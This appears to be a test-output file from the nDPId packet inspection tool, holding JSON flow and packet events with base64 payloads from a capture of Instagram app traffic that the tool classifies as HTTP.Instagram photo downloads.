+02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1436720942507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942507,"pkt":"QPMIw47hABsv8H60CABFAAW+7YVAADkGAKFcejCKwKgAZwBQolpM7hj\/zhvj2IAQAkuefgAAAQEIClRk1HoAA\/vEM\/iaPUALhIFKAs5lHhGDDQh9Ri+cJ7IlO3+U+lz\/AJfyy4DxuV\/4P\/o+vmeH\/hNqoIELoODxfoOAIXO0PMXMPnHoxqeYBwGo8oxahQh6j0xfzNnmEda9CmYCeDSna\/qNrEPvGW50RvR5h7uG+kXcGOBC7BGEPlQE7Yj9VADdS1kT29D7gnk\/qeBFzA3CDCDhz3gqv7gHmWA5mGyOJepR4EJPDEPmPiCsftA0fdwDBLwVjxH\/APKX29LRhXxOnSI4Ih5PTBEwQnYqjD3MPs\/lmZehG\/8AA\/8AT9Hx6L7CfPoFCO57QQY24Pf04EGPxc98QOB6OuYRGOvzGux+sHlCW3CnI9H6gK1Ng5mdNzFbgAyRCbreGctT5jQZEPRP6hHkIS+\/zCBFmIuGjFqI5\/uEmVBMg4hgvEdvaB+4PuYjwpncLG\/tARaSCgOECnAbe4e1GCNFARmxVQDALDyR+IOzv5nsz8T3R9wgRZi+8GdC55PovxL0YHoYoPEbSjg1BB16Ln\/4Ec+hG4XhdQP\/AAj\/AMS6qDzBT7P5oVuK4jP\/AJHo+vQ7xerHEOB\/MJM94fCL+ohnTjGoAOagD3iFagB4f5QswHhzoMy9DME64+YwcJGH3EIGYuyBB\/nEZ7TiCoY8wSKYOu5S3H2g4tgD7wANpxRQzjSFNilH9hDgQM9sJvDWSNGHs+0x8CbLnF1CclwLoBlRBpI3BxPAqGmw4ykVAG2kgAoGHly28ROIeyXA2GoWBRqYf9ufUEBje0FkRrD+IQecxboE3AOv7hC5gHugOOCfdiAGoheJXCdB6Ed+p6M6LnkF\/wDE\/UhuA8wf1fzRQdReggNdvURGX6gnc9o44SIJ4hEESg55h9ABOXCdAKBoAFARRJEzn9QkfZAdHcCZJ+0IfM82YFNwK2Mw9qjfbgB0alLX9QhRGT8SvaFD494T\/MQk8fqbOERdBBwkdmvmWKJzcwHIfLgJbfaBYGFByYLxbUA8zSMwDgeEJIj+oTwQfxK2SqgEvgPeFbIcbVX7KFvlB0KE87hYZQPRwPeH6uPhbjHBiWw7nL\/pnZCDnKByYHCBX5hgfMf3hZBZhDmz8QG7Sft6CPUI8RE4GpvB6ATxO3ovP\/jgJ7wEhHscGHx\/KuIHYBmYYPQqqng7Ew+z+eE4MfX\/AIH\/AIC6cAjiPoYHoIzU95cXVxsDhHD1AhE8T+IY4OoOZmio9RCbH6gBuoGYHNqg6GxAMRoQsrcD5h\/xiG2xCYJgDAIuFMDMWQBiwOT8QxkaQi4CCaSgP+GHg7nfnqF6wY1vXxCXqouAITzC5A3GyRRmF3HmjA9oXEGuJ4Jq1PKGF\/7E95xsZ1BT9jB0SPvOduIB7RHP\/I2Kh0kBNLD6MJz\/AJxbQj\/cwB4GCtzsgKZoQlqFxuEQHvc\/HoBi7iniEcIXcEEJgK9QOtGCOFaheFFdZ+3oP5CQaM\/4fzxGF7M4WoAHGX69x7j9FCP\/AB2jTxue8EBOF7EXZxDcScHjmEuIzgiYdDA4gRRtmHoJ56mwKX8F7wmCMfSKDe0XnQmaYuEnIC1Mc2QAHUVdCAtCh95n5imGNgyjyD5nfMLuXxBSoSDA8yxX\/E2oKG5iGgBLzCfMJ8wOCHsTPCecIsrQDCihrgix+Z7lA8uF2\/cOhJ+kLZAhOzHsR5iHYfYwUTAf3AWIwicr0HmfKhO7a+IxmwhfEE4GEoYUcHmODzCekU8+jhiigMf\/AMP\/AC\/+CLkzo9Jgh9HB5hJiiiPP\/m\/QDF7gHoYUsRjU4ATF9pWVBkA54Qk7j4h1hQB0nyIzIr0gCl4cXcIPGA8E49oZ0qhZBz7QqP8AqAKhDWgfxPgD+8p7uAtmJgK+HmA8sQ2B+ggN5gCPfcBNIz9YSgzZ9hABBp2CMzM="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1436720942508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720942508,"pkt":"ABsv8H60QPMIw47hCABFAAA0JelAAEAGxsfAqABnXHowiqJaAFDOG+PYTO4eiYAQH+pOOgAAAQEICgAD+8dUZNR5"} +02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1436720942509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942509,"pkt":"QPMIw47hABsv8H60CABFAAW+7YZAADkGAKBcejCKwKgAZwBQolpM7h6Jzhvj2IAQAkvuxQAAAQEIClRk1HoAA\/vEO6\/U4C+0OWUTJgAb794HkAIhArOYgdkfiI22BCGjBFAjMJ7H5gWBudggbAYMBAg88QCbuhm0hAg9wQYHeJyZzGwFB7zDuEb1CIxUMRuZfliB7np0MYgeoY4J7+qgeYPabQ\/aB4IL9PHo+vR91\/N\/x\/EBC\/8A0ezA+Z8w+PUejh1dzuvQYmm4BAIYI\/EcE+jUD4nkjsnAhNA8wx5OA5aeINz\/AAUBr\/OAOALiPDMHk39If+VARek0ggL5idUhkPX2hAQrDqABo5\/wj6blcUMHps+4h4H9wU9ldOEBaMbWJMBg7F6bLf4ECwWUHgrMEFkEjMCoIwBEzYQLC4LK3AoAyviVQjybhI9r6wlsCgB94VnhTqRmcsioR5j39iByFiDkW+p4l8DUIG3Dyi4mQAZhCyClDE8GHwYPw7gzQ7QkYBnMHUC44nvArqGLzB9YQbQj7EXX6jh\/8eYjwIFiiz8Q2EAOV\/J\/x\/NHF6LrmV6Dxcv0cqD0MXc+CC9nEbBVQOPX2ggjHHvMvqNwABPCOeMwlwkwvyoIxB0cfSIC0DB7xZrUJVmM5BC0yIAV7Yl2YC3A5ZgUA\/KF+xEAWdXLIAuYgd+YS27EPvuMQOQnQJw3GzgZ9R+JmMzlA+JlcA0TD1iDIUoajMm\/tESS4X3XHjoOZyDMKfeEmMwvwcoyHZ\/uUUCTC2rUXHInKoObP2gYKzOtS8IzHhA8F3HuZYIEo5ZHzE3qLhzoY+YAWCiPcGZwkp7ejUc+gga3G1eIfdfedlAT5gj5EE6gdzz6iFTkFQjlEicGXPeeH8X\/AB\/ED\/5XpeIz7wA8TpK\/gPv6VSjOjn1MAi\/3MI+8EfcCE7HBEANXcACPv6wUqjgLgz8RDKgfEwYWFaUo4Fqf7VxCfaXmKxR3zcPJAAMAF9qAAtEUIRw00NEmM0hCDHA7h7DEMhnudgYhPg9oeAYfNLwrg51CVPEQAWcPg7EXLL9MBJSwx9YZNq1KYagWYA+h4H0K2CvpPdEDv8GNXZrxEphqeRmaBf0jG3TP4gIo7h8Qnc7HMEPIQ9MYgoBDKJnhXF36CJa2ICTAm1lHzqHqEuYAMKeeIR3BwBhHkwuRAYAYoDD\/AOBC+IR1Pf8A9f8AA\/h\/p\/8AL9DK4jiQmCE+p9faB5idQkYTPD0B59HC\/aAQO7qV3CYV1ZgDiovRHuVyAfrBFwZNPjFwKif1AWf2J2OENoUB+iZ4gniUx+IHTH6wBkeYwWEmDrCuR+YjiR4wICxwiF5JxELRFQLQCHzHzuBEEnDGTAEqWD+ShAN5cKZpAYRsmSxHSjO2xQ6w+HMTYnzC1FonyIOIR3AYBABDff8AyDZtfEVIYiKJhQDgP8z5DwYCUEHYxPeKKGKB4hDSL3QYgR+UAOxj6StiMylB2zD5KM65g7cfcXxmA8LHvAuoZ5hg8w+6uLzB6JH6GVH6dnXp4ev\/AAP5gIT\/AOFzqcLgd\/8AjtF6GeB6BT3gEe4YP39BC4Sk49RQhRqeIehOPMAz8Inhwtq4LXEJ1aUu\/TzAstcfbxB5v9TsR6HUP3QMI4jOnKgzrELSNTN1A5H7Qk3lxdJcFQrcADz6E8y+DmEIbgGJhOH3BbcIGziEwHPJ+I+E4CPabiALnOh9A4O4qjsRRPELQDgwRZyEPYQruIeB+5TMEqcJo\/MI7Idz6oBxMrQnuUnkCBt\/UBe8Q9RQ1j1p3cA0hfMfiH3CITwf\/NQnmD0KswQ\/+f8Ah\/D9IUFjf\/oTHEIClQz2qBAYII+oVHHD6KGByZqnhBDD49B1AYAdwdz3iimo9Dc4Row\/KI5J\/uOEEGO5YEPBioY1COYTPdCMjxANjAId+EI6EA2AahcCHIIVEDqIt8j7wQrjygpv6whzUCbmYRCBYNQWyVqMbJQ="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00821{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1436720942530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720942530,"pkt":"ABsv8H60QPMIw47hCABFAAE4n8hAAEAGa\/HAqABnUlUaouLEAFAvtWVoUhBMjIAYFINNAAAAAQEICgAD+8pWC84nR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExNDE3MzQ5XzE2MTA0MjQ0NTI1NTk2MzhfMTU1OTA5NjE1Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtZy5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11417349_1610424452559638_1559096152_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7560000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1436720942580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1436720942580,"pkt":"ABsv8H60QPMIw47hCABFAAEzOUlAAEAG0nXAqABnUlUaouLFAFD1YMTERbSUBYAYD2PW+wAAAQEICgAD+89WC83JR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMzc5Mjg0XzE2NTE0MTY3OTg0MDgyMTRfMTUyNTY0MTQ2Nl9uLmpwZyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWcuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7560000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11379284_1651416798408214_1525641466_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +02389{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1436720942592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAFAADkG3jJSVRqiwKgAZwBQ4sRSEEyML7VmbIAQAggFiAAAAQEIClYL0tgAA\/vKSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBUaHUsIDA5IEp1bCAyMDE1IDIxOjI4OjQ3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTE3NzgwDQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA5OjAyIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDA4NzQ5MDAwMDFlNjAwMDAwZmE3MzAwMDA2M2U0MDAwMGEyMzYwMTAwZTk2MDAxMDAxMmNjMDEwMDdkMTQwMjAwZGE1ZjAyMDAA\/9sAQwAHBwcHBwcMBwcMEQwMDBEXERERERceFxcXFxceJB4eHh4eHiQkJCQkJCQkKysrKysrMjIyMjI4ODg4ODg4ODg4\/9sAQwEJCQkODQ4ZDQ0ZOyghKDs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7\/8IAEQgEOAQ4AwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAQAAQIDBQYHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAAO9N4sXTDu15V0zXWqS6eeKmgreaCCmgg7uEVJBFpoIqbJxUnCLu4QeTiZpSHB3cGdOqZ3QRk7jdJJupIE7IbunTdJ01OMhpJ0O7ON3aSOfwekxeD0uW5b1DncnTsA9NJjtugMD53fqZhIgWgSaAtbEsWQtyzLPTnJhkzlli0uis5Bw7O7irEdfDm7Q3o5VwFjvEUYqlhUYWiOMp6HN4L9xoRfHbOtZDzdIqnt5UkurlUXoRcsXKR16897uavZ1aZJAySBM7AzpAoyQRQgyWmsrLZ1OZUcAMdHNE+Pr4jXWjcf5Yn6n5BjRjQdkY2Ci0j2KtwOa\/UpM3ThJRs3xi0n0mLpwZpOEVJkou7MSd02Z3ZFpOEHkgZ06GTuOLuhNJONJONnSQ6khpJwSdxp0k3SkN0kh3Zxu7STU1Wnghs\/P2jYmxyVZaPV5dg9EEcFEMbREli20VTekwDSyB3KDNbYk3lNtwDNIYAe3by0E+sjys0+hryZgbUO7JtFhyPAtU9x0fnXT5Pe0s8iDQmLcK2RFHXhU6XTyJnQ28l6vzLNitasqL77zvTx19X0ci6zQXnPPdfP7MvnHFT+lsL59dHsm\/89emZV6Rwnnza5jdZxo6r1zovBcxn0zk+Fuz0rN88YOj54WAHVCQZESpRo6asDUEg+pcTzW\/zOv0wrwT2tqjD9I4GWD0GFZpn3V3jttz7jDCvpQgFzWGnoul5+tsu35+PE65+hGeTZlT7uR8ydJvn72\/jvpsaaqz69ctVZ2lpLKT0oqTAk8hxUkhJOCdONJONpJwUoyTdncE6dNSUk25Pb4401KwD+XrjwXoWViQow+4a5bP6vJ0nnR9YKwCs6sKb6awPu58RHXNxxs1uwH0ZoswO2Gbbm0i2IA2jMsDvRdUaULFs2KwzolWtLXv2s7q0nGSLJCq2zNhzG32cRjcZ5mHvkvmnpYZ\/G44avfLzN1IbE7nlky\/T\/MstLZrG1W\/PSfZOu5d\/ArvpDw\/t5uJCKz6NPKChFXSGiq1p59mmZDDhAbKIjC40UhbGFKqLSdOLO4MkkfQh1cJjj+O9GqqPQOf5vU87txCsYGo7vZ879onVefdz8yDmjOv7+Tz\/pFy8v0="} +02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1436720942592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAJAADkG3jFSVRqiwKgAZwBQ4sRSEFIWL7VmbIAQAghpXgAAAQEIClYL0tgAA\/vKkxiut5qB26Ow9Pj8+yfWMCa4DUGy+Ho3+c5jmKfpvReNdKH0EH5lbcbz+eZjXvWt849W37RLwLcqfYn89ApepLzJrn01eX8qj3x\/Byg9vl4hMftksS8eq4V9yQ9dg87nd3j8t6NPn9HZ78M8\/m15\/SI4iV0+Hr5YZdJFWiriRaANGqKgC2yBU5D1y9AGO5LwC+hZAOnTCa0b8GSfSXc3ZK6AUI8M2\/RlL0N3AaXqkYlae70WFvXE\/MysjfHhicTX059\/nyudDYrqom8O\/SwbXeAYWCl2HDbeHOmh0nFvU+hbHnPQ5vucrmudw17ngsyPVk8VHSYNOA4HAkiaZ9LkB4VlFV6oQoQoqHF7YpwjYwQuo3UsJOh\/RGPbfOPDFikaxDY4DU5OkkXmo2bPofj3YqtI3A2tMe8H5Nt8O55y1B5\/7N5\/Hj7N63x3O1z+g38A6wXb+eEc9NDyaVW6IJldX6R5B6ZmuRoJAaDtPubZt\/FrO\/ofNxI07nn+e9Kt8ed1WPUA43vniOOoe+MdtjoYlp8vJuziWF9ZSfTEwvQuT1MrucEnl3NmPfozec2Q8b4rocvm7XZ0ZulcvKtUOGRAQ4+gnWZDVgPNWhEKtHOpze6ZyDRXdX8BKT0GfAkRXbz40uX19WJqIDO0OmFTszkplJub3z+cPQ\/JvQ6z862sGNz1mVnCXPSY4Ty9OzHqpGSzpKihVIIPNmVKcRNOqLCYDILVVeEY398LgV1vOVI9RE0wT4QEQJpSDAaZU3nNoOD251yCtoLfS5daqb9QCMzcp43dzem6ufhS6Oew6aI6IVlfacgTJtbFeleWXZh0ue8o8\/FVehcsDozfPVyqd2beAaLdw7AEWuPBsy\/NtRo7nK6amwzE7wely5\/Li6bHG7EM3mel42aI9A86edPRMPG0Ly9C4IXGVdSXyWneZ42VsFYuj6kTogdbNyRn62pnUvPuruzMr3A+oweXcoviYt9jgW6815zm+k8\/tAB\/OBUuybA1gvm903GUlLnZS6ZF4KFr24FYdVfxNcHoN\/nFir0ejjdiS\/RN6WHm6VtwnvhPbN\/CPbfkffMXtuX3qjh3relJQiEoMQKEpOyKasJqDId1NjV21hXC6QDvdJEJVO1s\/Q\/zN6OTm8v3oOGonI9l57alQUrkXYpZMcsGthFgcg05VXIYrOJRhIhUfQ\/A63I8zG3eKzunHr8oC2NDAbQaOkGxtKX2WhycdMdrn93jLkKuKz3vZ9JmVLTQZa3BEZ0bqBxVlISUosM18C1LstzjfR8zjgcXvgyeor56XydIvT6GCMTACyMtUrgCKhlE19BSC9tDF2gkO5dOOJom5fPt2VnLbnJsVlaDDEPHHuS8fSny7ebZ3qPK2w9TgzU+rEx8ulpAaNFzDbyos643zk7Ou5p5O+X0FYusqEnp3Q6dbPtiuk0uU14ejc98q24cupIjGzSHlDhtF575ZOO+XSVH4SnEqKawNGGtZiJmIRtjEC5UnTQtnUn51xEfWfPtM8B7b2wbSKwHWlcGMSfEWVosImWLXNObHxqcs3YBBYOiCN6LkB4epBLK0KLAqqCHVFoZN\/S\/La3Ded0EcjPZ3z3AN\/GxrIy9iG8YgvWH1PnkuwzLWQPtqlhubqs540iAhZVVsNHpgy+LaCMldVgpipyGjRNCQdSLo8zK5\/dN6RMPzzXjRmF7eCA9vW05aci1898xYkdUwXtNbK2ik7MtyrTKySLWrnk2azz+9hky9fQzRuXXXQYOOm8sLU6Mz+T6DMig+c38yaBw+rLTxauj59VjG6rUoWWXRciQb8rJMP0s6wZdhrOeI1OpspY+oXQgyBjtBm3CyFWZNgavivsvzz15cAGTDTH0Hz\/1jzPKsrUpltBIzz0jO0ZWIpZqARY="} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720950909,"flow_last_seen":1436720950909,"flow_idle_time":7560000,"flow_min_l4_payload_len":1398,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1398,"flow_avg_l4_payload_len":1398,"midstream":1,"thread_ts_msec":1436720950909,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1436720950909,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720950909,"pkt":"QPMIw47hABsv8H60CABFAAWqgMlAAFYGaDQfDVY0wKgAZwBQ42ig4vcaLhm0z4AQADsFTwAAAQEIChPCQpUAA\/8J\/RR\/Qw44auNd5sy65M8X7sSNLvesqLPp\/hWIEgj7u\/c3G33+CGWHr5NjTBvseCa33d9vm54JLq\/16uWtfE8LiAl4wMLDP475fV1R18fJlgWHzmvfo5rv8qseyXDb2HUuXqKoKX0JEHYQ4SCsd7x2l6PL5eytk2f\/kmJp\/iODsxx2N\/N4UQwH1r7vqSLq\/y5DElOXzRARZUzbImejgsz5wOzVgeOngfBrQtGX6fL5DmkthCiZgx4mBvjCvzFR0YP1xM0OXv+CShnIqVrP5zMdqJDyzU483pE+34fsEdDMZT4JhGoy\/98gru4qi0lyXyEksrGabld776ByfJIVVp4RivH8YLNUqtpfCVBnMTiA7j\/sfl7slzSCJaM2S8tAkbhjEusFLl75fI1asIxOiRsWcrVhmx\/PbZlpNd4K8\/v2iJLC1YElBY1y9j56WJc0LPwne+0suiyX3kgj3Fb6y+5RCsQCy2EKLdhWRbyLYVKkL4lX1A\/hBl\/EQkdQU6AhwlzHoU9XC8zrf\/sv+pTGiGgMczA3HQL0c6iXziIlynBHwH6WDIGpFhs4sIl7R4Y0SaCPOZA1lnMfjRJoKCOWKLZc4VEiazWUhaMala+ExIJc2XmtrYy\/iRYyo+LY2ytYUtBbJwRglHwtVOPffxRf4sv1nIag0M0miGXxU6GsLdqvokImfUh+1xnyRB2wekFeanQUhm7KU2GNA\/Wut8I6Yh\/BrGK2ISAtFCkh5uw9+EN15dd79TckDZ5M\/1IXL8vqbu\/hTG\/JfucZfR3dz3L3c+OhdygQW8UzKVOFvvFE3uZQnd322DAH7zC3LRHAXbCjqHBmwf2whhpegjLfm6RfL+z+IzmMokA9e2qfVhZ6xYQdwpjxowXA\/a0hFuEIYBqgg2RBxOTW9B0lNexKZj7L7myCIQt5asMs3OULjIFOSJmLxUIk3Q37w4ymEfVUM4Q7YQrd2Q7D7oXQeE3jsBBmSxiRovqahgnBN4hvIeCZZMLY1uvosfkYR3vNLSiHuKZeam\/RFQJomYqTPcrO3yya\/L8n\/bJvfwlRzHWNuu76VGEBOTSmIQrzPwlvzfa91FS9xmltfjK8v2vivjQ79d9wnDovM7E8heMjng\/L76qTSur9Xu++liqI9lESwcV36\/iMv+UhBAvwlNl9yFOXzTHExcfuKxDjy2WcT\/yjID\/XwdhLUHYsgQ9jzrKZiitJYPrb03G\/4eqDHUUFspftslQp6lFXZbtMgT+PtX+iul7L97VDMHXGdwaI8TzZ6\/jXre8vnY2F+CmIZKNEjnJpMB39UHX\/p7\/3FfZpIUwHcB3IlgFw2RAH5dbcIGzC1nhuJYVIQctqJ04wUFMG9bZhr46HZ73BXAQuUhUW68mxXOEcSUvu6IiD4944qVAoG\/m5vfXCzer8TXXbtxGJy\/lJZWKxmuOzEdM\/69tZAld3d7Oi+E\/\/wSXdP1F9r8RHsvFnMaKa\/Gb3fFq120z5cfUI5ObITs4O5x1e\/k2SP4T55SQ1l\/\/E7jbfd3y\/W+K4YanQb4PNdLvnwtOUEVU10v172Jve733E93FYrd8\/r7COigUu\/j7zMkQoWBxC6yXxRL8fBFpX1\/jifjboOb9QR4q79l+S7kBZXF3dpMduttP55\/mpWYFflzvfd\/Hx+Ie9ijit30tVfYliZvDoVqX8Iibo18xmX2SURsTLcDlv6t9hYNRdUnFiX1r9e4\/4uD+iVcRBUU8hc0fHv5tu\/ghpv97F5dOxeZj2CiEjpYqtM2N6y9Ex9X2v34njvtqIprtcVwGtsEjAY8n2yd95fX6LnY6678J3vfovd9+pLl7ZMl\/\/3mgopvtAOiqdmdl8m1KgVxW1IDqxnD5Yq+7jVsvs"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1436720950910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720950910,"pkt":"ABsv8H60QPMIw47hCABFAAA0TetAAEAGtojAqABnHw1WNONoAFAuGbTPoOL3GoAQH8w2dwAAAQEICgAD\/xATwkKT"} +02380{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1436720950911,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720950911,"pkt":"QPMIw47hABsv8H60CABFAAWqgMpAAFYGaDMfDVY0wKgAZwBQ42ig4vyQLhm0z4AYADulrQAAAQEIChPCQpYAA\/8JIuSEmFKcHvUO79IuA4AtgLK1ooHfe\/xvCx6EanjcjDye5qfYfg99btIFMlfpEyS0+WXx48YQQIBKyWOQayb5WbhMWSz8Ru7MV\/a5RJtywzl84iv9BLl6PdqXz3kxPZm4yY8HdjILE3vdfyWVN0